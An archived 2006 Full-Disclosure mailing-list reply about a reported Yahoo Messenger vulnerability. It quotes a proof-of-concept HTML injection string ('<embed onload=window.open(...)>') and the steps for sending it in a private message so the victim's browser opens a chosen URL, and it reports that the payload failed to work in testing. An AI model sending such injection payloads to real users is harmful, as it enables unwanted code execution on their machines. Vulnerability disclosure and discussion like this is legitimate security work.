lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Fri, 28 Jul 2006 11:20:11 -0500
From: "John Dietz" <www.whitewolf@...il.com>
To: "Ivan Ivan" <ivancool2003@...oo.com.ar>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Yahoo messenger serious bug

I just tried this in Mesenger 7.0 and it never opened a browser window.  I
copied the text exactly from here and made sure the space after helomsg was
[Alt]+0160 and the most I could get it to do was do a Yahoo Search on the
string.  Other side sees:

s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:
---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:
---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
Yahoo! Search: No results were found for helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:
---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:
---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(.

There must be some other settings on either mesenger or the computer itself
for this to work as you say.  Possibly a setting for mesenger to use your
default browser for searches in stead of the PM window?

Cheers


On 7/28/06, Ivan Ivan <ivancool2003@...oo.com.ar> wrote:
>
> Hi,
> I found another vulnerability in yahoo messenger that
> if you receive a Private message with this string
>
> "helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> onload=window.open
> ('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> onload=window.open
> ('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?("
> (without quotes) Yahoo messenger open in this case
> google.com in the internet explorer of the remote
> victim.
>
> Yahoo messenger bug proof of concept:
>
> 1. Open messenger and log it.
>
> 2. Open a yahoo chat third party like yahelite through
> Ymsgr protocol and log it with another account.
>
> 3. Send a Pm to the messenger account with this
> string: s: helomsg
>
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> onload=window.open('http:\\\\google.com/')>helomsg
>
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> onload=window.open('http:\\\\google.com/')>helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
>
> 4. The remote user will open www.google.com (you can
> change)
>
> Note: "helomsg :" this space must be created with
> alt+0160 and this "s: " with a space
>
>
> s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> onload=window.open
> ('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> onload=window.open
> ('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
>
> Tested in yahoo messenger 7.0/7.5
>
>
> Regards.
>
>
>
>
>
> __________________________________________________
> Preguntá. Respondé. Descubrí.
> Todo lo que querías saber, y lo que ni imaginabas,
> está en Yahoo! Respuestas (Beta).
> ¡Probalo ya!
> http://www.yahoo.com.ar/respuestas
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
There is intelligence is in having all the answers, but wisdom lies in
knowing which of the questions to answer.

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ